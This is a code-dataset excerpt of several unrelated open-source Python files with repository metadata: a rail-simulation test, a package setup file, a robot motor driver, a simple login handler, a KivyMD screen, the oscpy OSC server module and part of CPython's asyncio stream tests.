obs_builder_object=GlobalObsForRailEnv()).reset()
def test_sparse_generator_changes_to_grid_mode():
"""
Test that grid mode is invoked and two cities are created when the env is too small to place random cities.
We size the env such that two cities fit in grid mode but are unlikely to fit under random mode,
and we fix the random seed to make sure we never create random cities.
"""
rail_env = RailEnv(width=10, height=20, rail_generator=sparse_rail_generator(
max_num_cities=100,
max_rails_between_cities=2,
max_rails_in_city=2,
seed=15,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv())
for test_run in range(10):
with warnings.catch_warnings(record=True) as w:
rail_env.reset(True, True, True, random_seed=12)
assert "[WARNING]" in str(w[-1].message)
| 53.24147
| 164
| 0.636468
|
9a7082c94a928097352bd06e5f52289baf6a6e5c
| 1,458
|
py
|
Python
|
python/aixexplainer/setup.py
|
pvaneck/kserve
|
5ba63e74eadd66797b6681fcefd89d7e2462ffac
|
[
"Apache-2.0"
] | null | null | null |
python/aixexplainer/setup.py
|
pvaneck/kserve
|
5ba63e74eadd66797b6681fcefd89d7e2462ffac
|
[
"Apache-2.0"
] | null | null | null |
python/aixexplainer/setup.py
|
pvaneck/kserve
|
5ba63e74eadd66797b6681fcefd89d7e2462ffac
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
tests_require = [
'pytest',
'pytest-tornasync',
'mypy'
]
setup(
name='aixserver',
version='0.2.1',
author_email='Andrew.Butler@ibm.com',
license='https://github.com/kubeflow/kfserving/LICENSE',
url='https://github.com/kubeflow/kfserving/python/aixserver',
description='Model Server implementation for AI eXplainability with LIME. \
Not intended for use outside KFServing Frameworks Images',
long_description=open('README.md').read(),
python_requires='>3.4',
packages=find_packages("aixserver"),
install_requires=[
"kfserving>=0.4.0",
"argparse >= 1.4.0",
"numpy >= 1.8.2",
"aix360 >= 0.1.0",
"lime >= 0.1.1.37",
"nest_asyncio>=1.4.0"
],
tests_require=tests_require,
extras_require={'test': tests_require}
)
| 33.136364
| 79
| 0.683128
|
c5b463cd8a3faed3e0f06fb7ebe1011a5bfddef0
| 2,417
|
py
|
Python
|
motors/main.py
|
Abhiek187/floor-printing-robot
|
f1e5ffcdc74b4fb66a4f3607241a162016d58f99
|
[
"MIT"
] | null | null | null |
motors/main.py
|
Abhiek187/floor-printing-robot
|
f1e5ffcdc74b4fb66a4f3607241a162016d58f99
|
[
"MIT"
] | null | null | null |
motors/main.py
|
Abhiek187/floor-printing-robot
|
f1e5ffcdc74b4fb66a4f3607241a162016d58f99
|
[
"MIT"
] | 1
|
2020-03-08T00:28:29.000Z
|
2020-03-08T00:28:29.000Z
|
#!/usr/bin/python
from PCA9685 import PCA9685
from time import sleep
Dir = [
'forward',
'backward',
]
pwm = PCA9685(0x40, debug=False)
pwm.setPWMFreq(50) # freq range: 40 - 1000
class MotorDriver():
def __init__(self):
self.PWMA = 0
self.AIN1 = 1
self.AIN2 = 2
self.PWMB = 5
self.BIN1 = 3
self.BIN2 = 4
def MotorRun(self, motor, index, speed):
if speed > 100:
return
if motor == 0:
pwm.setDutycycle(self.PWMA, speed)
if index == Dir[0]:
pwm.setLevel(self.AIN1, 0)
pwm.setLevel(self.AIN2, 1)
else:
pwm.setLevel(self.AIN1, 1)
pwm.setLevel(self.AIN2, 0)
else:
pwm.setDutycycle(self.PWMB, speed)
if index == Dir[0]:
pwm.setLevel(self.BIN1, 0)
pwm.setLevel(self.BIN2, 1)
else:
pwm.setLevel(self.BIN1, 1)
pwm.setLevel(self.BIN2, 0)
def MotorStop(self, motor):
if motor == 0:
pwm.setDutycycle(self.PWMA, 0)
else:
pwm.setDutycycle(self.PWMB, 0)
"""
Notes:
Front of bot = side away from pi
Motor 1 moves opposite to the commanded direction and is slower than motor 0.
Speed range: 0 - 100
"""
def move_forward(speed, duration=0):
Motor.MotorRun(0, 'forward', speed*0.85)
Motor.MotorRun(1, 'backward', speed)
sleep(duration)
def move_backwards(speed, duration=0):
Motor.MotorRun(0, 'backward', speed*0.85)
Motor.MotorRun(1, 'forward', speed)
sleep(duration)
def turn_left(speed, duration=0):
Motor.MotorRun(0, 'backward', speed)
Motor.MotorRun(1, 'backward', speed)
sleep(duration)
def turn_right(speed, duration=0):
Motor.MotorRun(0, 'forward', speed)
Motor.MotorRun(1, 'forward', speed)
sleep(duration)
def stop(duration=0):
Motor.MotorStop(0)
Motor.MotorStop(1)
sleep(duration)
#print("Testing the motors...")
Motor = MotorDriver()
"""try:
while True:
print("Moving forward...")
move_forward(20, 1)
print("Moving backwards...")
move_backwards(20, 1)
print("Turning right...")
turn_right(40, 1)
print("Turning left...")
turn_left(40, 1)
except IOError as e:
print(e)
except KeyboardInterrupt:
print("Stopping the motors...")
stop()"""
| 23.466019
| 65
| 0.571783
|
71771d941c4063480220eae681d43eecb07edf6b
| 1,875
|
py
|
Python
|
website/.meta/login.html.py
|
ALo0f/CSE389Project
|
3b26fa432433c5b69b5de236a6f49d4a007d1fcb
|
[
"MIT"
] | 1
|
2020-10-21T03:18:33.000Z
|
2020-10-21T03:18:33.000Z
|
website/.meta/login.html.py
|
ALo0f/CSE389Project
|
3b26fa432433c5b69b5de236a6f49d4a007d1fcb
|
[
"MIT"
] | null | null | null |
website/.meta/login.html.py
|
ALo0f/CSE389Project
|
3b26fa432433c5b69b5de236a6f49d4a007d1fcb
|
[
"MIT"
] | 1
|
2020-11-05T02:54:25.000Z
|
2020-11-05T02:54:25.000Z
|
# script for handling login.html parameters
import os
import sys
import argparse
from email.utils import formatdate
HEADER_Accepted = [
"HTTP/1.1 302 Verified\r\n",
"Date: {}\r\n".format(formatdate(timeval=None, localtime=False, usegmt=True)),
"Server: Pr0j3ct subprocess\r\n",
"Location: /presentation.html\r\n"
]
HEADER_Rejected = [
"HTTP/1.1 403 Rejected\r\n",
"Date: {}\r\n".format(formatdate(timeval=None, localtime=False, usegmt=True)),
"Server: Pr0j3ct subprocess\r\n",
"Content-Length: {}\r\n",
"Content-Type: text/html; charset=utf-8\r\n"
]
def verify(rootDirectory, username, password):
"""
Load local database and verify username and password
"""
with open(os.path.join(rootDirectory, "users.keys"), "r") as inFile:
data = inFile.readlines()
for u, p in zip(data[0::2], data[1::2]):
if username == u.strip():
if password == p.strip(): return True
break
return False
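# Illustrative layout (an assumption, not shipped with this snippet) of the
# users.keys file that verify() reads: usernames on even lines and the
# matching passwords on the following odd lines, e.g.
#
#   alice
#   s3cret
#   bob
#   hunter2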
def accept():
"""
print HEADER_Accepted
"""
print("".join(HEADER_Accepted), end="")
print()
def reject(rootDirectory):
"""
print HEADER_Rejected followed by the rejection html content
"""
with open(os.path.join(rootDirectory, "login.html.rejected.html"), "r") as inFile:
data = inFile.read()
print("".join(HEADER_Rejected).format(len(data)), end="")
print()
print(data, end="")
print()
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--username", help="username for login")
parser.add_argument("--password", help="password for login")
args, _ = parser.parse_known_args()
if (args.username) and (args.password):
if verify(os.path.dirname(sys.argv[0]), args.username, args.password):
accept()
else:
reject(os.path.dirname(sys.argv[0]))
| 28.846154
| 86
| 0.6256
|
6f755ea0c2aa86763d3f5f985c5a57e02de40cc6
| 850
|
py
|
Python
|
demos/crane/libs/baseclass/root_screen.py
|
Jonypr-code/KivyMD
|
3ac5ba86430d9002baef678b47f0d7873b66b7bd
|
[
"MIT"
] | 1,111
|
2015-07-15T02:31:09.000Z
|
2022-03-29T17:22:02.000Z
|
demos/crane/libs/baseclass/root_screen.py
|
AllSafeCybercurity/kivyMD
|
85c51f3e7a26ca170d639e73899df5d465ee8941
|
[
"MIT"
] | 706
|
2015-06-10T22:24:13.000Z
|
2022-03-31T16:22:39.000Z
|
demos/crane/libs/baseclass/root_screen.py
|
AllSafeCybercurity/kivyMD
|
85c51f3e7a26ca170d639e73899df5d465ee8941
|
[
"MIT"
] | 561
|
2015-07-15T04:57:23.000Z
|
2022-03-31T17:14:31.000Z
|
from os import environ
from kivy.clock import Clock
from kivy.properties import StringProperty
from kivy.uix.image import Image
from kivymd.theming import ThemableBehavior
from kivymd.uix.boxlayout import MDBoxLayout
from kivymd.uix.screen import MDScreen
class CraneRootScreen(ThemableBehavior, MDScreen):
def __init__(self, **kwargs):
super().__init__(**kwargs)
Clock.schedule_once(self._late_init)
def _late_init(self, i):
self.image = Image(
source=f"{environ['CRANE_ROOT']}/assets/images/logo_light.png",
size_hint=(None, None),
size=("40dp", "40dp"),
)
self.ids.tab.tab_bar.add_widget(self.image, index=1)
class CraneListItem(ThemableBehavior, MDBoxLayout):
text = StringProperty()
secondary_text = StringProperty()
image = StringProperty()
| 28.333333
| 75
| 0.702353
|
7e4bab1adaa2f31d62bd7e85ed86081913415dc6
| 21,858
|
py
|
Python
|
oscpy/oscpy/server.py
|
WeilerWebServices/Kivy
|
54e3438156eb0c853790fd3cecc593f09123f892
|
[
"MIT"
] | 6
|
2021-12-25T08:57:23.000Z
|
2022-03-26T22:10:38.000Z
|
oscpy/server.py
|
simasimataiyo/IFJoiner
|
b6318dafde2c86759790f2f75675aec9e5560c70
|
[
"MIT"
] | null | null | null |
oscpy/server.py
|
simasimataiyo/IFJoiner
|
b6318dafde2c86759790f2f75675aec9e5560c70
|
[
"MIT"
] | null | null | null |
"""Server API.
This module currently only implements `OSCThreadServer`, a thread based server.
"""
import logging
from threading import Thread, Event
import os
import re
import inspect
from sys import platform
from time import sleep, time
from functools import partial
from select import select
import socket
from oscpy import __version__
from oscpy.parser import read_packet, UNICODE
from oscpy.client import send_bundle, send_message
from oscpy.stats import Stats
logger = logging.getLogger(__name__)
def ServerClass(cls):
"""Decorate classes with for methods implementing OSC endpoints.
This decorator is necessary on your class if you want to use the
`address_method` decorator on its methods, see
`:meth:OSCThreadServer.address_method`'s documentation.
"""
cls_init = cls.__init__
def __init__(self, *args, **kwargs):
cls_init(self, *args, **kwargs)
for m in dir(self):
meth = getattr(self, m)
if hasattr(meth, '_address'):
server, address, sock, get_address = meth._address
server.bind(address, meth, sock, get_address=get_address)
cls.__init__ = __init__
return cls
__FILE__ = inspect.getfile(ServerClass)
class OSCThreadServer(object):
"""A thread-based OSC server.
Listens for osc messages in a thread, and dispatches the messages
values to callbacks from there.
The '/_oscpy/' namespace is reserved for metadata about the OSCPy
internals, please see package documentation for further details.
"""
def __init__(
self, drop_late_bundles=False, timeout=0.01, advanced_matching=False,
encoding='', encoding_errors='strict', default_handler=None, intercept_errors=True
):
"""Create an OSCThreadServer.
- `timeout` is a number of seconds used as a time limit for
select() calls in the listening thread, optional, defaults to
0.01.
- `drop_late_bundles` instructs the server not to dispatch calls
from bundles that arrived after their timetag value.
(optional, defaults to False)
- `advanced_matching` (defaults to False), setting this to True
activates the pattern matching part of the specification; leave
this False if you don't need it, as it triggers a lot more
computation for each received message.
- `encoding` if defined, will be used to encode/decode all
strings sent/received to/from unicode/string objects, if left
empty, the interface will only accept bytes and return bytes
to callback functions.
- `encoding_errors` if `encoding` is set, this value will be
used as `errors` parameter in encode/decode calls.
- `default_handler` if defined, will be used to handle any
message that no configured address matched, the received
arguments will be (address, *values).
- `intercept_errors`, if True, means that exception raised by
callbacks will be intercepted and logged. If False, the handler
thread will terminate mostly silently on such exceptions.
"""
self._must_loop = True
self._termination_event = Event()
self.addresses = {}
self.sockets = []
self.timeout = timeout
self.default_socket = None
self.drop_late_bundles = drop_late_bundles
self.advanced_matching = advanced_matching
self.encoding = encoding
self.encoding_errors = encoding_errors
self.default_handler = default_handler
self.intercept_errors = intercept_errors
self.stats_received = Stats()
self.stats_sent = Stats()
t = Thread(target=self._run_listener)
t.daemon = True
t.start()
self._thread = t
self._smart_address_cache = {}
self._smart_part_cache = {}
def bind(self, address, callback, sock=None, get_address=False):
"""Bind a callback to an osc address.
A socket in the list of existing sockets of the server can be
given. If no socket is provided, the default socket of the
server is used, if no default socket has been defined, a
RuntimeError is raised.
Multiple callbacks can be bound to the same address.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
if isinstance(address, UNICODE) and self.encoding:
address = address.encode(
self.encoding, errors=self.encoding_errors)
if self.advanced_matching:
address = self.create_smart_address(address)
callbacks = self.addresses.get((sock, address), [])
cb = (callback, get_address)
if cb not in callbacks:
callbacks.append(cb)
self.addresses[(sock, address)] = callbacks
def create_smart_address(self, address):
"""Create an advanced matching address from a string.
The address will be split by '/' and each part will be converted
into a regexp, using the rules defined in the OSC specification.
"""
cache = self._smart_address_cache
if address in cache:
return cache[address]
else:
parts = address.split(b'/')
smart_parts = tuple(
re.compile(self._convert_part_to_regex(part)) for part in parts
)
cache[address] = smart_parts
return smart_parts
def _convert_part_to_regex(self, part):
cache = self._smart_part_cache
if part in cache:
return cache[part]
else:
r = [b'^']
for i, _ in enumerate(part):
# getting a 1 char byte string instead of an int in
# python3
c = part[i:i + 1]
if c == b'?':
r.append(b'.')
elif c == b'*':
r.append(b'.*')
elif c == b'[':
r.append(b'[')
elif c == b'!' and r and r[-1] == b'[':
r.append(b'^')
elif c == b']':
r.append(b']')
elif c == b'{':
r.append(b'(')
elif c == b',':
r.append(b'|')
elif c == b'}':
r.append(b')')
else:
r.append(c)
r.append(b'$')
smart_part = re.compile(b''.join(r))
cache[part] = smart_part
return smart_part
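# Illustrative examples (not part of the class) of the per-part translation
# performed above, following the OSC 1.0 pattern syntax:
#   b'b?r'       -> b'^b.r$'        ('?' matches exactly one character)
#   b'*'         -> b'^.*$'         ('*' matches any run of characters)
#   b'{bar,baz}' -> b'^(bar|baz)$'  (comma-separated alternatives)
#   b'[!0-9]x'   -> b'^[^0-9]x$'    ('!' negates a character class)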
def unbind(self, address, callback, sock=None):
"""Unbind a callback from an OSC address.
See `bind` for `sock` documentation.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
if isinstance(address, UNICODE) and self.encoding:
address = address.encode(
self.encoding, errors=self.encoding_errors)
callbacks = self.addresses.get((sock, address), [])
to_remove = []
for cb in callbacks:
if cb[0] == callback:
to_remove.append(cb)
while to_remove:
callbacks.remove(to_remove.pop())
self.addresses[(sock, address)] = callbacks
def listen(
self, address='localhost', port=0, default=False, family='inet'
):
"""Start listening on an (address, port).
- if `port` is 0, the system will allocate a free port
- if `default` is True, the instance will save this socket as the
default one for subsequent calls to methods with an optional socket
- `family` accepts the 'unix' and 'inet' values, a socket of the
corresponding type will be created.
If family is 'unix', then the address must be a filename, the
`port` value won't be used. 'unix' sockets are not defined on
Windows.
The socket created to listen is returned, and can be used later
with methods accepting the `sock` parameter.
"""
if family == 'unix':
family_ = socket.AF_UNIX
elif family == 'inet':
family_ = socket.AF_INET
else:
raise ValueError(
"Unknown socket family, accepted values are 'unix' and 'inet'"
)
sock = socket.socket(family_, socket.SOCK_DGRAM)
if family == 'unix':
addr = address
else:
addr = (address, port)
sock.bind(addr)
self.sockets.append(sock)
if default and not self.default_socket:
self.default_socket = sock
elif default:
raise RuntimeError(
'Only one default socket authorized! Please set '
'default=False to other calls to listen()'
)
self.bind_meta_routes(sock)
return sock
def close(self, sock=None):
"""Close a socket opened by the server."""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
if platform != 'win32' and sock.family == socket.AF_UNIX:
os.unlink(sock.getsockname())
else:
sock.close()
if sock == self.default_socket:
self.default_socket = None
def getaddress(self, sock=None):
"""Wrap call to getsockname.
If `sock` is None, uses the default socket for the server.
Returns (ip, port) for an inet socket, or filename for a unix
socket.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
return sock.getsockname()
def stop(self, s=None):
"""Close and remove a socket from the server's sockets.
If `sock` is None, uses the default socket for the server.
"""
if not s and self.default_socket:
s = self.default_socket
if s in self.sockets:
read = select([s], [], [], 0)
s.close()
if s in read:
s.recvfrom(65535)
self.sockets.remove(s)
else:
raise RuntimeError('{} is not one of my sockets!'.format(s))
def stop_all(self):
"""Call stop on all the existing sockets."""
for s in self.sockets[:]:
self.stop(s)
sleep(10e-9)
def terminate_server(self):
"""Request the inner thread to finish its tasks and exit.
May be called from an event, too.
"""
self._must_loop = False
def join_server(self, timeout=None):
"""Wait for the server to exit (`terminate_server()` must have been called before).
Returns True if and only if the inner thread exited before timeout."""
return self._termination_event.wait(timeout=timeout)
def _run_listener(self):
"""Wrapper just ensuring that the handler thread cleans up on exit."""
try:
self._listen()
finally:
self._termination_event.set()
def _listen(self):
"""(internal) Busy loop to listen for events.
This method is called in a thread by the `listen` method, and
will be the one actually listening for messages on the server's
sockets, and calling the callbacks when messages are received.
"""
match = self._match_address
advanced_matching = self.advanced_matching
addresses = self.addresses
stats = self.stats_received
def _execute_callbacks(_callbacks_list):
for cb, get_address in _callbacks_list:
try:
if get_address:
cb(address, *values)
else:
cb(*values)
except Exception as exc:
if self.intercept_errors:
logger.error("Unhandled exception caught in oscpy server", exc_info=True)
else:
raise
while self._must_loop:
drop_late = self.drop_late_bundles
if not self.sockets:
sleep(.01)
continue
else:
try:
read, write, error = select(self.sockets, [], [], self.timeout)
except (ValueError, socket.error):
continue
for sender_socket in read:
try:
data, sender = sender_socket.recvfrom(65535)
except ConnectionResetError:
continue
for address, tags, values, offset in read_packet(
data, drop_late=drop_late, encoding=self.encoding,
encoding_errors=self.encoding_errors
):
stats.calls += 1
stats.bytes += offset
stats.params += len(values)
stats.types.update(tags)
matched = False
if advanced_matching:
for sock, addr in addresses:
if sock == sender_socket and match(addr, address):
callbacks_list = addresses.get((sock, addr), [])
if callbacks_list:
matched = True
_execute_callbacks(callbacks_list)
else:
callbacks_list = addresses.get((sender_socket, address), [])
if callbacks_list:
matched = True
_execute_callbacks(callbacks_list)
if not matched and self.default_handler:
self.default_handler(address, *values)
@staticmethod
def _match_address(smart_address, target_address):
"""(internal) Check if provided `smart_address` matches address.
A `smart_address` is a list of regexps to match
against the parts of the `target_address`.
"""
target_parts = target_address.split(b'/')
if len(target_parts) != len(smart_address):
return False
return all(
model.match(part)
for model, part in
zip(smart_address, target_parts)
)
def send_message(
self, osc_address, values, ip_address, port, sock=None, safer=False
):
"""Shortcut to the client's `send_message` method.
Use the default_socket of the server by default.
See `client.send_message` for more info about the parameters.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
stats = send_message(
osc_address,
values,
ip_address,
port,
sock=sock,
safer=safer,
encoding=self.encoding,
encoding_errors=self.encoding_errors
)
self.stats_sent += stats
return stats
def send_bundle(
self, messages, ip_address, port, timetag=None, sock=None, safer=False
):
"""Shortcut to the client's `send_bundle` method.
Use the `default_socket` of the server by default.
See `client.send_bundle` for more info about the parameters.
"""
if not sock and self.default_socket:
sock = self.default_socket
elif not sock:
raise RuntimeError('no default socket yet and no socket provided')
stats = send_bundle(
messages,
ip_address,
port,
sock=sock,
safer=safer,
encoding=self.encoding,
encoding_errors=self.encoding_errors
)
self.stats_sent += stats
return stats
def get_sender(self):
"""Return the socket, ip and port of the message that is currently being managed.
Warning::
this method should only be called from inside the handling
of a message (i.e, inside a callback).
"""
frames = inspect.getouterframes(inspect.currentframe())
for frame, filename, _, function, _, _ in frames:
if function == '_listen' and __FILE__.startswith(filename):
break
else:
raise RuntimeError('get_sender() not called from a callback')
sock = frame.f_locals.get('sender_socket')
address, port = frame.f_locals.get('sender')
return sock, address, port
def answer(
self, address=None, values=None, bundle=None, timetag=None,
safer=False, port=None
):
"""Answers a message or bundle to a client.
This method can only be called from a callback, it will lookup
the sender of the packet that triggered the callback, and send
the given message or bundle to it.
`timetag` is only used if `bundle` is True.
See `send_message` and `send_bundle` for info about the parameters.
Only one of `values` or `bundle` should be defined, if `values`
is defined, `send_message` is used with it, if `bundle` is
defined, `send_bundle` is used with its value.
"""
if not values:
values = []
sock, ip_address, response_port = self.get_sender()
if port is not None:
response_port = port
if bundle:
return self.send_bundle(
bundle, ip_address, response_port, timetag=timetag, sock=sock,
safer=safer
)
else:
return self.send_message(
address, values, ip_address, response_port, sock=sock
)
def address(self, address, sock=None, get_address=False):
"""Decorate functions to bind them from their definition.
`address` is the osc address to bind to the callback.
if `get_address` is set to True, the first parameter the
callback will receive will be the address that matched (useful
with advanced matching).
example:
server = OSCThreadServer()
server.listen('localhost', 8000, default=True)
@server.address(b'/printer')
def printer(values):
print(values)
send_message(b'/printer', [b'hello world'])
note:
This won't work on methods as it'll call them as normal
functions, and the callback won't get a `self` argument.
To bind a method use the `address_method` decorator.
"""
def decorator(callback):
self.bind(address, callback, sock, get_address=get_address)
return callback
return decorator
def address_method(self, address, sock=None, get_address=False):
"""Decorate methods to bind them from their definition.
The class defining the method must itself be decorated with the
`ServerClass` decorator, the methods will be bound to the
address when the class is instantiated.
See `address` for more information about the parameters.
example:
osc = OSCThreadServer()
osc.listen(default=True)
@ServerClass
class MyServer(object):
@osc.address_method(b'/test')
def success(self, *args):
print("success!", args)
"""
def decorator(decorated):
decorated._address = (self, address, sock, get_address)
return decorated
return decorator
def bind_meta_routes(self, sock=None):
"""This module implements osc routes to probe the internal state of a
live OSCPy server. These routes are placed in the /_oscpy/ namespace,
and provide information such as the version, the existing routes, and
usage statistics of the server over time.
These requests will be sent back to the client's address/port that sent
them, with the osc address suffixed with '/answer'.
examples:
'/_oscpy/version' -> '/_oscpy/version/answer'
'/_oscpy/stats/received' -> '/_oscpy/stats/received/answer'
messages to these routes require a port number as argument, to
know which port to send the answer to.
"""
self.bind(b'/_oscpy/version', self._get_version, sock=sock)
self.bind(b'/_oscpy/routes', self._get_routes, sock=sock)
self.bind(b'/_oscpy/stats/received', self._get_stats_received, sock=sock)
self.bind(b'/_oscpy/stats/sent', self._get_stats_sent, sock=sock)
def _get_version(self, port, *args):
self.answer(
b'/_oscpy/version/answer',
(__version__, ),
port=port
)
def _get_routes(self, port, *args):
self.answer(
b'/_oscpy/routes/answer',
[a[1] for a in self.addresses],
port=port
)
def _get_stats_received(self, port, *args):
self.answer(
b'/_oscpy/stats/received/answer',
self.stats_received.to_tuple(),
port=port
)
def _get_stats_sent(self, port, *args):
self.answer(
b'/_oscpy/stats/sent/answer',
self.stats_sent.to_tuple(),
port=port
)
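# Minimal usage sketch of the meta routes bound above; this block is purely
# illustrative (not part of the upstream module) and assumes two
# OSCThreadServer instances on localhost with arbitrary example ports.
if __name__ == '__main__':
    server = OSCThreadServer()
    server.listen('localhost', 8000, default=True)

    client = OSCThreadServer()
    client.listen('localhost', 8001, default=True)

    @client.address(b'/_oscpy/routes/answer')
    def got_routes(*routes):
        print('server exposes:', routes)

    # Ask the server for its bound routes; the answer is sent back to the
    # port given as the first value (8001, where `client` is listening).
    client.send_message(b'/_oscpy/routes', [8001], 'localhost', 8000)
    sleep(0.1)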
| 34.260188
| 97
| 0.579147
|
fffd1cad99ea2b1172aa43af550545575025a3ab
| 648
|
py
|
Python
|
tests/unit/transports/transport_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/transports/transport_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/transports/transport_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Copyright (c) 2011-2015, Agora Games, LLC All rights reserved.
https://github.com/agoragames/haigha/blob/master/LICENSE.txt
'''
from chai import Chai
from haigha.transports.transport import Transport
class TransportTest(Chai):
def test_init_and_connection_property(self):
t = Transport('conn')
assert_equals('conn', t._connection)
assert_equals('conn', t.connection)
def test_process_channels(self):
t = Transport('conn')
ch1 = mock()
ch2 = mock()
chs = set([ch1, ch2])
expect(ch1.process_frames)
expect(ch2.process_frames)
t.process_channels(chs)
| 23.142857
| 62
| 0.658951
|
eab71e80308fefc20469c3c5c87d66c4b332fb63
| 69,862
|
py
|
Python
|
Lib/test/test_asyncio/test_streams.py
|
dhdavvie/cpython
|
c9345e382c630ddcc2b148b30954640e0e435c8a
|
[
"CNRI-Python-GPL-Compatible"
] | 4
|
2019-09-12T02:35:07.000Z
|
2022-01-19T23:04:45.000Z
|
Lib/test/test_asyncio/test_streams.py
|
anuragkumarak95/cpython
|
d309352c6fd93a51f2b3011ca8c2125d3a5d394b
|
[
"CNRI-Python-GPL-Compatible"
] | 3
|
2020-03-15T21:17:00.000Z
|
2020-03-15T22:50:40.000Z
|
Lib/test/test_asyncio/test_streams.py
|
anuragkumarak95/cpython
|
d309352c6fd93a51f2b3011ca8c2125d3a5d394b
|
[
"CNRI-Python-GPL-Compatible"
] | 2
|
2017-11-22T23:32:25.000Z
|
2018-11-15T01:31:39.000Z
|
"""Tests for streams.py."""
import contextlib
import gc
import io
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio.streams import _StreamProtocol, _ensure_can_read, _ensure_can_write
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class StreamModeTests(unittest.TestCase):
def test__ensure_can_read_ok(self):
self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READ))
self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READWRITE))
def test__ensure_can_read_fail(self):
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
_ensure_can_read(asyncio.StreamMode.WRITE)
def test__ensure_can_write_ok(self):
self.assertIsNone(_ensure_can_write(asyncio.StreamMode.WRITE))
self.assertIsNone(_ensure_can_write(asyncio.StreamMode.READWRITE))
def test__ensure_can_write_fail(self):
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
_ensure_can_write(asyncio.StreamMode.READ)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
try:
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(
open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
self.assertEqual(messages, [])
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
